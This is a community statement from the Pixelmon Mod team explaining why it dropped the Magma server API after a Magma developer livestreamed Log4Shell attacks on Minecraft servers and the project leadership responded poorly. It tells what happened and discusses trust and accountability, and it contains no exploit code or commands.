To read this post in document form, go to here (Pixelmon Storage) or here (Google Drive)
The Pixelmon Mod will no longer be supporting, recommending or working with the Magma Team, a Spigot-Forge hybrid server API, for having compromised the security of modded communities online. While this post first intends to disseminate information regarding this event, we hope they explain why Magma’s breach of trust goes beyond PixelmonMod.
On the morning of December 10th, 2021, Magma’s developer TheDevMinerTV exploited the Log4j RCE (Remote Code Execution) vulnerability known as Log4Shell. (You can read about how this affects Minecraft at this Mojang blog post. We confirmed that TheDevMinerTV was actively teaching and exploiting the Log4Shell vulnerability against public servers, while their project lead, Hexeption, watched. We have successfully confirmed that 26 servers, and a number of clients ranging from vanilla to modded, were targeted with several payloads including shutdown code. The stream in question was hosted in Magma’s very own public voice channels, which showcased the malicious consequences of TheDevMinerTV’s actions on servers and clients alike.
Upon discovering the source of the attacks, affected public servers and our own staff contacted moderation members of the Magma project to get their help in protecting their servers against the Log4Shell vulnerability. Indeed, chat logs confirmed that they raised the alarm in Magma’s own discord. However, despite the severity of their developer’s actions, no Magma member intervened to stop the attacks. This allowed TheDevMinerTV to continue under the eyes of their project’s senior members.
After our community’s reports of the attacks, Magma silently removed TheDevMinerTV’s development rank from their Discord. Their Discord admin, Kwright02, deleted all messages of our members reporting these events, clearing their Discord of any evidence this ever happened. Thanks to that, TheDevMinerTV’s account remains active on their Discord, providing support for unsuspecting members of the modded community.
At our request, a meeting was arranged to discuss the events of December 10th. Sadly, Hexeption did not attend the meeting, leaving my Community Manager waiting almost 2 hours with no explanation; instead sending junior members of their team without any knowledge of the situation. The present Magma moderators that attended did commit to gathering information on the actions of their developer. Several days later, we were provided with a repository of the code executed by TheDevMinerTV.
Thanks to the log contributions of the community, we were able to determine that Magma delivered false information. Indeed, the executed code provided did not match the logs of the victim servers, making it impossible to ascertain the scope of the Log4Shell damage. Furthermore, affected servers allowed us to confirm that TheDevMinerTV used both their own Minecraft account, as well as alts to continuously attack servers. Further timeline analysis allowed us to prove that TheDevMinerTV’s teachings inspired others to attack more servers, endlessly increasing the damages caused by Magma’s negligence.
Upon disproving the evidence provided by Magma, we contacted Hexeption one last time, on December 13th, 2021 to discuss the way forward. Having contacted the affected servers within our community, it was within our interest to understand Magma’s response to the events.
After failing to stop Log4Shell attacks, deleting chat logs, providing false evidence and keeping silent and inactive in the face of a grave action by their team, Magma’s lead, Hexeption, clarified that they “don’t have control over the actions of [their] staff team”. In fact, TheDevMiner’s actions were “done in [their] free time”, and therefore, our issue would be “an issue with DevMiner”. For all intents and purposes, Magma feels as though they should not be held responsible for TheDevMiner’s actions.
The Pixelmon Mod feels differently. We have learned that modded projects such as ours become an integral part of the Minecraft community. We recognize that the actions of our teams reflect on the modded community at large - our successes instill trust in players, and pave the way for years of shared growth. Yet our failures are just as important. Magma’s failure to address the actions of their developer, when witnessed by their project leader and admins, affects far beyond those 26 targeted servers. After meeting our partners and contacts to inform them of the situation, we felt this post was needed to clarify and inform others beyond our reach.
Magma’s negligence breaches the trust users place in modded projects like ours, and many more. We will not accept their inconsiderate carelessness in the face of dangerous RCE exploits within Minecraft. The security of our community is non-negotiable, and we will hold them responsible even when they won’t. In light of this, we will not be recommending Magma as a server API, and we will urge our readers to do the same.
This all said, I would like to note that Magma’s code is not an issue here. It is open source, readable and anyone with experience can tell you it is safe. Like the broader modding community, most mods/codebases can be considered trustworthy thanks to the efforts of the modding community as a whole. Software accountability is a part of that. Open-source projects are generally a safe way to ensure the code/software you are using is safe. That said, it does come down to the people compiling that code. You may not know how to review that code yourself, and because of that you will have to trust the people maintaining that project that the binaries built for release are exactly as displayed in the open source repository. Quoted from Lex, the project manager for Minecraft Forge, “You have to have a level of trust in the developers to not do something malicious in the depths of the code, or out of view in the build service.” This is an issue with the human factor; it took one person to take malicious steps and missteps from those around them that in the opinion of my staff and I, has irreparably damaged Magma's reputation.
With that I would remind software developers in this community that you should be careful who represents your project, who you give access to your code/release structure. Do due diligence in your hiring practices, and make sure you have a system of accountability in place.
I would like to thank my own community, the staff team of Aternos, members of Minecraft Forge, the staff of MMD, our partner Nodecraft, Ryan at ATLauncher and Jared from CraftTweaker for their support, meeting with us on this issue to discuss, disseminate and make clear the issue at hand and how we would address it going forward.